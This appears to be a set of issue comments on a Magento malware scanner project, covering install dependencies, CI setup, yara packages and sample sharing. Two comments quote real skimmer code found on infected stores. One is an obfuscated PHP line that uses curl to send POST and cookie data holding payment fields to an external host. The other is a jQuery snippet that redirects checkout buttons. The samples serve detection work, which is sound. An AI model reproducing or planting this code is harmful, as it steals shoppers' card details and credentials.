magento-malware-scanner
Scanner, signatures and the largest collection of Magento malware
You need to check if Python packages are already installed and managed with yum or apt, instead of re-installing them with pip. This will break other Python projects.
The documentation for usage notes that python-pip, gcc and python-dev are required for install; however, you also need python-setuptools on Debian Stretch for the "pip install" to succeed.
From app/code/core/Mage/Core/functions.php:
```
if (preg_match("/".base64_decode('Zmlyc3RuYW1lfGN2YzJ8Y2NfbnVtYmVyfHVzZXJuYW1lfGNjX3xzaGlwcGluZ3xjdnZ8bW9udGh8ZHVtbXl8c2VjdXJldHJhZGluZ3x5ZWFyfGxvZ2lufGJpbGxpbmd8ZXhwaXJ5fHBheW1lbnR8Y2FyZF9udW1iZXI=')."/i", serialize($_POST)))
- @shell_exec("curl --data \"version=1&encode=".base64_encode( serialize($_POST) . "--" . serialize($_COOKIE) )."&host=".$_SERVER["HTTP_HOST"]."\" ".trim(base64_decode('aHR0cDovL3ZlcnBheW1lbnQuY29tL3Rlc3RTZXJ2ZXIucGhw'))." > /dev/null 2
```
I found this line manually after a deep mwscan.
https://blog.travis-ci.com/2017-08-31-trusty-as-default-status Probably need to verify whether the default yara packages for Trusty are sufficient.
It was adding the following code in some of the JS files; in our case it was quickview.js and ccard.js:
```
jQuery(document).ready(function() {
    if(!(document.cookie.indexOf("userpayid") + 1)) {
        jQuery("*[onclick^=\"shippingMethod.save()\"]").attr("onclick", "paynow_right();");
        jQuery("*[onclick^=\"checkout.save();\"]").attr("onclick", "paynow_right();");
        jQuery("*[onclick=\"payment.save()\"]").attr("onclick", "paynow_right();");...
```
There's a malware sharing platform called "MISP" (or https://github.com/MISP), which might provide a more useful structure for sharing these samples than GitHub. Found through https://twitter.com/da_667/status/832217900127834112